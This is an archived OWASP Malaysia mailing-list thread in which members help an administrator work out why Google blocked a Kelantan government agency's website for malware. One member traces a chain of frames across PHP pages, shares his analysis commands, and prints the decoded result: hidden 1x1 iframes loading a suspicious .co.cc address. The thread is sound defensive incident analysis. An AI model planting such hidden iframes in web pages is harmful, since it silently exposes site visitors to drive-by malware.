[Owasp-Malaysia] Malware Detected!

Adnan bin Mohd Shukor adnan.shukor at gmail.com
Tue Feb 8 05:00:40 EST 2011


mamp <= LOL typo.. it should be nano
js <= one of hte binary in Spidermonkey. get the patched version
http://blog.didierstevens.com/programs/spidermonkey/ and if you are
working on MacOS/Darwin, apply this patch
http://blog.xanda.org/2010/10/15/fix-for-spidermonkey-build-issue-in-darwin/

thanks

On 8 February 2011 17:56, Sharuzzaman Ahmat Raslan
<sharuzzaman at gmail.com> wrote:
> I can see 2 interesting apps/scripts:
>
> 1. mamp
> 2. /opt/analysis/js/js
>
> care to share? hopefully it is open source ;)
>
>
> On Tue, Feb 8, 2011 at 5:50 PM, Adnan bin Mohd Shukor
> <adnan.shukor at gmail.com> wrote:
>>
>> Here is my bash history:
>>
>> xanda:tmp adnan$ history
>> <snip>
>>  500  cd /tmp
>>  501  wget http:/www2.pkink.gov.my/indexsedc.php
>>  502  wget http://www2.pkink.gov.my/indexsedc.php
>>  503  nano indexsedc.php
>>  504  wget http://www2.pkink.gov.my/indexsedc.php
>>  505  mamp indexsedc.php.1
>>  506  nano indexsedc.php.1
>>  507  wget http://www2.pkink.gov.my/sedc.php
>>  508  nano sedc.php
>>  509  wget http://www2.pkink.gov.my/default.php
>>  510  nano default.php
>>  511  nano default.php
>>  512  clear
>> <I've remove tags and leave clean JavaScript inside>
>>  513  mv default.php default.txt
>>  514  /opt/analysis/js/js < default.txt
>>  515  cat write.log
>>  516  history
>> xanda:tmp adnan$
>>
>> Below is the output of the cat:
>> [output]
>> xanda:tmp adnan$ cat write.log
>> <iframe width="1" height="1"
>>
>> src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA=="></iframe>"<iframe
>> width="1" height="1"
>>
>> src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA=="></iframe>"
>> [/output]
>>
>>
>> Hint: you might use modified version of spidermonkey to 'understand'
>> the javascript
>>
>> Thanks
>>
>> On 8 February 2011 17:38, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
>> > thanks for the info..
>> > i will check all the file.
>> >
>> > how you found it?
>> >
>> > On Tue, Feb 8, 2011 at 5:21 PM, Adnan bin Mohd Shukor
>> > <adnan.shukor at gmail.com> wrote:
>> >>
>> >> Here is the flow:
>> >>
>> >> 1) your indexsedc.php has an iframe to sedc.php
>> >> 2) and your sedc.php has an iframe to default.php
>> >> 3) and in default.php (look at the last 2 lines), javascript will
>> >> actually create an iframe to
>> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>> >>
>> >> thanks :)
>> >>
>> >> On 8 February 2011 17:07, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
>> >> > can you point...
>> >> > my index.htm or indexsedc.php or other file?
>> >> >
>> >> > On Tue, Feb 8, 2011 at 4:19 PM, Adnan bin Mohd Shukor
>> >> > <adnan.shukor at gmail.com> wrote:
>> >> >>
>> >> >> you have iframe pointed to
>> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>> >> >>
>> >> >> which is not xss :)
>> >> >>
>> >> >> >From my personal point of view, its either caused by:
>> >> >> 1) malware on pc which has been used for ftp/access to the server
>> >> >> 2) compromised server
>> >> >>
>> >> >> you can send your access.log to cyber999 at cybersecurity.my or
>> >> >> mycert at mycert.org.my for further analysis :)
>> >> >>
>> >> >> thanks
>> >> >>
>> >> >> On 8 February 2011 16:00, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
>> >> >> > I have check it.
>> >> >> > On Tue, Feb 8, 2011 at 3:49 PM, Rasta Boy <rastaboyz at gmail.com>
>> >> >> > wrote:
>> >> >> >>
>> >> >> >> Hi Mohd Symsuri,
>> >> >> >>
>> >> >> >> Why dont you check on the reason why its being blocked, it might
>> >> >> >> help.
>> >> >> >>
>> >> >> >>
>> >> >> >>
>> >> >> >>
>> >> >> >>
>> >> >> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.pkink.gov.my/
>> >> >> >>
>> >> >> >>
>> >> >> >>
>> >> >> >>
>> >> >> >>
>> >> >> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=AS:4788
>> >> >> >>
>> >> >> >> Regards,
>> >> >> >> Kishur
>> >> >> >>
>> >> >> >>
>> >> >> >>
>> >> >> >> On Tue, Feb 8, 2011 at 3:19 PM, Mohd Syamsuri
>> >> >> >> <msyamsuri at gmail.com>
>> >> >> >> wrote:
>> >> >> >>>
>> >> >> >>> Assalamualikum and Good day for my fellow friends.
>> >> >> >>> I need some advise.
>> >> >> >>> Web site Perbadanan kemajuan Iktisad Negeri Kelantan
>> >> >> >>> (http://www.pkink.gov.my) have been blocked by Google for almost
>> >> >> >>> 4
>> >> >> >>> days.
>> >> >> >>> It said that we host malware on our server Malware Detected! (
>> >> >> >>> Google
>> >> >> >>> said that!!)
>> >> >> >>> What i did is..
>> >> >> >>> 1. Scan all the data and upload a new data
>> >> >> >>> 2. Check the index.html or index.php
>> >> >> >>> 3. Scan using web scanner using
>> >> >> >>> http://www.avgthreatlabs.com/
>> >> >> >>> http://www.virustotal.com
>> >> >> >>> but still get block..
>> >> >> >>> Googel said Suspected injected code
>> >> >> >>> <FRAME SRC="http://www2.pkink.gov.my/indexsedc.php"
>> >> >> >>> NAME="confcontent"
>> >> >> >>> scrolling=yes >
>> >> >> >>> I have using this code for almost 2 years
>> >> >> >>> What should i do now?
>> >> >> >>>
>> >> >> >>> --
>> >> >> >>> best regard
>> >> >> >>> syamsuri
>> >> >> >>>
>> >> >> >>>
>> >> >> >>>
>> >> >> >>> _______________________________________________
>> >> >> >>> Owasp-Malaysia mailing list
>> >> >> >>> Owasp-Malaysia at lists.owasp.org
>> >> >> >>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>> >> >> >>>
>> >> >> >>> OWASP Malaysia Wiki
>> >> >> >>> http://www.owasp.org/index.php/Malaysia
>> >> >> >>>
>> >> >> >>> OWASP Malaysia Wiki Facebook
>> >> >> >>>
>> >> >> >>>
>> >> >> >>>
>> >> >> >>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>> >> >> >>
>> >> >> >>
>> >> >> >> _______________________________________________
>> >> >> >> Owasp-Malaysia mailing list
>> >> >> >> Owasp-Malaysia at lists.owasp.org
>> >> >> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>> >> >> >>
>> >> >> >> OWASP Malaysia Wiki
>> >> >> >> http://www.owasp.org/index.php/Malaysia
>> >> >> >>
>> >> >> >> OWASP Malaysia Wiki Facebook
>> >> >> >>
>> >> >> >>
>> >> >> >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>> >> >> >
>> >> >> >
>> >> >> >
>> >> >> > --
>> >> >> > best regard
>> >> >> > syamsuri
>> >> >> >
>> >> >> >
>> >> >> >
>> >> >> > _______________________________________________
>> >> >> > Owasp-Malaysia mailing list
>> >> >> > Owasp-Malaysia at lists.owasp.org
>> >> >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>> >> >> >
>> >> >> > OWASP Malaysia Wiki
>> >> >> > http://www.owasp.org/index.php/Malaysia
>> >> >> >
>> >> >> > OWASP Malaysia Wiki Facebook
>> >> >> >
>> >> >> >
>> >> >> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>> >> >> >
>> >> >> _______________________________________________
>> >> >> Owasp-Malaysia mailing list
>> >> >> Owasp-Malaysia at lists.owasp.org
>> >> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>> >> >>
>> >> >> OWASP Malaysia Wiki
>> >> >> http://www.owasp.org/index.php/Malaysia
>> >> >>
>> >> >> OWASP Malaysia Wiki Facebook
>> >> >>
>> >> >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>> >> >
>> >> >
>> >> >
>> >> > --
>> >> > best regard
>> >> > syamsuri
>> >> >
>> >> >
>> >> >
>> >> > _______________________________________________
>> >> > Owasp-Malaysia mailing list
>> >> > Owasp-Malaysia at lists.owasp.org
>> >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>> >> >
>> >> > OWASP Malaysia Wiki
>> >> > http://www.owasp.org/index.php/Malaysia
>> >> >
>> >> > OWASP Malaysia Wiki Facebook
>> >> >
>> >> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>> >> >
>> >> _______________________________________________
>> >> Owasp-Malaysia mailing list
>> >> Owasp-Malaysia at lists.owasp.org
>> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>> >>
>> >> OWASP Malaysia Wiki
>> >> http://www.owasp.org/index.php/Malaysia
>> >>
>> >> OWASP Malaysia Wiki Facebook
>> >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>> >
>> >
>> >
>> > --
>> > best regard
>> > syamsuri
>> >
>> >
>> >
>> > _______________________________________________
>> > Owasp-Malaysia mailing list
>> > Owasp-Malaysia at lists.owasp.org
>> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>> >
>> > OWASP Malaysia Wiki
>> > http://www.owasp.org/index.php/Malaysia
>> >
>> > OWASP Malaysia Wiki Facebook
>> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>> >
>> _______________________________________________
>> Owasp-Malaysia mailing list
>> Owasp-Malaysia at lists.owasp.org
>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>
>> OWASP Malaysia Wiki
>> http://www.owasp.org/index.php/Malaysia
>>
>> OWASP Malaysia Wiki Facebook
>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>
>
>
> --
> Sharuzzaman Ahmat Raslan
>
> _______________________________________________
> Owasp-Malaysia mailing list
> Owasp-Malaysia at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>
> OWASP Malaysia Wiki
> http://www.owasp.org/index.php/Malaysia
>
> OWASP Malaysia Wiki Facebook
> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>


More information about the Owasp-Malaysia mailing list